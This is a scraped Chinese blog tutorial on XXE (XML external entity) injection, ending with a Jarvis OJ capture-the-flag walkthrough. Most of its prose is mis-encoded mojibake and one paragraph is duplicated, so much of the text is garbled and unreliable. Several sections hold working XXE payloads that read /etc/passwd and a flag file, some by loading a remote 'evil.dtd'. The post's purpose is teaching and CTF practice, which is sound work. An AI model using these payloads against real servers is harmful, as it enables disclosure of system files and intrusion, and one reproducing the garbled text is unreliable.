XXE婕忔礊
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XXE婕忔礊相关的知识,希望对你有一定的参考价值。
鏍囩锛?a href='http://www.mamicode.com/so/1/%e5%8f%82%e8%80%83' title='鍙傝€?>鍙傝€?/a> 2-2 odi pass 鏁版嵁 ati efi 浣跨敤 寮曞叆
XML鍩虹鐭ヨ瘑
XXE婕忔礊
XXE鍏ㄧО鏄疿ML External Entity,涔熷氨鏄疿ML澶栭儴瀹炰綋娉ㄥ叆鏀诲嚮.婕忔礊鏄湪瀵逛笉瀹夊叏鐨勫閮ㄥ疄浣撴暟鎹繘琛屽鐞嗘椂寮曞彂鐨勫畨鍏ㄩ棶棰樸€?/p>
DTD
DTD鍏ㄧО鏄疶he document type definition锛屽嵆鏄枃妗g被鍨嬪畾涔夛紝鍙畾涔夊悎娉曠殑XML鏂囨。鏋勫缓妯″潡銆?br>
瀹冧娇鐢ㄤ竴绯诲垪鍚堟硶鐨勫厓绱犳潵瀹氫箟鏂囨。鐨勭粨鏋勩€侱TD 鍙鎴愯鍦板0鏄庝簬 XML 鏂囨。涓?鍐呴儴澹版槑锛夛紝涔熷彲浣滀负涓€涓閮ㄥ紩鐢ㄣ€?/p>
鍐呴儴澹版槑DTD
XXE鍏ㄧО鏄疿ML External Entity,涔熷氨鏄疿ML澶栭儴瀹炰綋娉ㄥ叆鏀诲嚮.婕忔礊鏄湪瀵逛笉瀹夊叏鐨勫閮ㄥ疄浣撴暟鎹繘琛屽鐞嗘椂寮曞彂鐨勫畨鍏ㄩ棶棰樸€?/p>
DTD鍏ㄧО鏄疶he document type definition锛屽嵆鏄枃妗g被鍨嬪畾涔夛紝鍙畾涔夊悎娉曠殑XML鏂囨。鏋勫缓妯″潡銆?br> 瀹冧娇鐢ㄤ竴绯诲垪鍚堟硶鐨勫厓绱犳潵瀹氫箟鏂囨。鐨勭粨鏋勩€侱TD 鍙鎴愯鍦板0鏄庝簬 XML 鏂囨。涓?鍐呴儴澹版槑锛夛紝涔熷彲浣滀负涓€涓閮ㄥ紩鐢ㄣ€?/p>
<!DOCTYPE 鏍瑰厓绱?[鍏冪礌澹版槑]>
<?xml version="1.0" encoding="UTF-8"?>
<锛丏OCTYPE note[ //DTD
<锛丒LEMENT note锛坱o,from,login锛?gt; //瀹氫箟鍏冪礌
<锛丒LEMENT to锛?PCDATA锛?gt;
<锛丒LEMENT from锛?PCDATA锛?gt;
<锛丒LEMENT login锛?PCDATA锛?gt;
]>
<note>
<to> tony </ to>
<from> anmi </ from>
<login>123</ login>
</ note>
寮曠敤澶栭儴DTD:
<!DOCTYPE 鏍瑰厓绱?SYSTEM "鏂囦欢鍚?quot;>
<!DOCTYPE 鏍瑰厓绱?PUBLIC "public_ID" "鏂囦欢鍚?quot;>
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don鈥榯 forget me this weekend!</body>
</note>
杩欐槸鍖呭惈DTD鐨勨€?note.dtd鈥濇枃浠讹細
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
鍦―TD涓殑瀹炰綋绫诲瀷锛屼竴鑸垎涓猴細鍐呴儴瀹炰綋鍜屽閮ㄥ疄浣擄紝缁嗗垎鍙堝垎涓轰竴鑸疄浣撳拰鍙傛暟瀹炰綋銆?/p>
鍙傛暟瀹炰綋(鐢?澹版槑,鐢?寮曠敤銆?DTD涓0鏄?DTD涓紩鐢?
鍏朵綑瀹炰綋(鐩存帴鐢ㄥ疄浣撳悕绉板0鏄?浣跨敤&寮曠敤銆? DTD涓0鏄?xml涓紩鐢?
鍐呴儴瀹炰綋:
<!ENTITY 瀹炰綋鍚嶇О "瀹炰綋鍐呭">
澶栭儴瀹炰綋:
<!ENTITY 瀹炰綋鍚嶇О SYSTEM "URI">
<!ENTITY 瀹炰綋鍚嶇О PUBLIC "public_ID" "URI">
鍙傛暟瀹炰綋:
<!ENTITY % 瀹炰綋鍚嶇О "瀹炰綋鍐呭">
鎬庝箞鍒ゆ柇缃戠珯鏄惁瀛樺湪XXE婕忔礊
鏈€鐩存帴鐨勬柟娉曞氨鏄敤burp鎶撳寘锛岀劧鍚庯紝淇敼HTTP璇锋眰鏂规硶锛屼慨鏀笴ontent-Type澶撮儴瀛楁绛夌瓑锛屾煡鐪嬭繑鍥炲寘鐨勫搷搴旓紝鐪嬬湅搴旂敤绋嬪簭鏄惁瑙f瀽浜嗗彂閫佺殑鍐呭锛屼竴鏃﹁В鏋愪簡锛岄偅涔堟湁鍙兘XXE鏀诲嚮婕忔礊
鏋勯€犲閮ㄥ疄浣撴敞鍏ョ殑鏂规硶
1.鐩存帴閫氳繃DTD澶栭儴瀹炰綋澹版槑
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE NPFS[
<!ENTITY npfs SYSTEM "file:///home/ctf/flag.txt">]>
<something>&npfs;</something>
2.閫氳繃DTD鏂囨。寮曞叆澶栭儴DTD鏂囨。锛屽啀寮曞叆澶栭儴瀹炰綋澹版槑
xml鍐呭锛?/p>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY %d SYSTEM "http://www.123.com/evil.dtd">
%d;
]>
<aaa>&b;</aaa>
DTD鏂囦欢(evil.dtd)鍐呭
<!ENTITY b SYSTEM "file:///etc/passwd">
3.閫氳繃DTD澶栭儴瀹炰綋澹版槑寮曞叆澶栭儴瀹炰綋澹版槑
xml鍐呭锛?/p>
<?xml verstion="1.0" encoding="utf-8"?>
<!DOCTYPE a SYSTEM "http://www.123.com/evil.dtd">
<a>&b;</a>
DTD鏂囦欢(evil.dtd)鍐呭
<!ENTITY b SYSTEM "file:///etc/passwd">
鍙﹀锛屼笉鍚岀▼搴忔敮鎸佺殑鍗忚鏄笉涓€鏍?
锛圝arvis OJ锛塧pi璋冪敤
go,鎶撳寘
鍙互鍙戠幇杩欓噷搴旂敤鐨刢ontent-Type鏄痡son
JSON(JavaScript Object Notation, JS 瀵硅薄绠€璋? 鏄竴绉嶈交閲忕骇鐨勬暟鎹氦鎹㈡牸寮忋€傚叾璇炵敓鍘熷洜鏄洜涓篨ML鏁村悎鍒癏TML涓悇涓祻瑙堝櫒瀹炵幇鐨勭粏鑺備笉灏界浉鍚?/p>
JSON鏈?绉嶇粨鏋勫舰寮忥紝閿€煎褰㈠紡鍜屾暟缁勫舰寮忥紙濡傜澶翠簩鎵€绀猴級
鍙堝洜涓洪鐩甴int:璇疯娉曡幏寰楃洰鏍囨満鍣?home/ctf/flag.txt涓殑flag鍊?/p>
鍒ゆ柇涓篨XE婕忔礊
灏唈son淇敼涓簒ml,骞舵瀯閫犲閮ㄥ紩鐢?/p>
鍙傝€冿細
https://xz.aliyun.com/t/3357#toc-22
https://p0rz9.github.io/2019/02/27/xxe/#
https://security.tencent.com/index.php/blog/msg/69
以上是关于XXE婕忔礊的主要内容,如果未能解决你的问题,请参考以下文章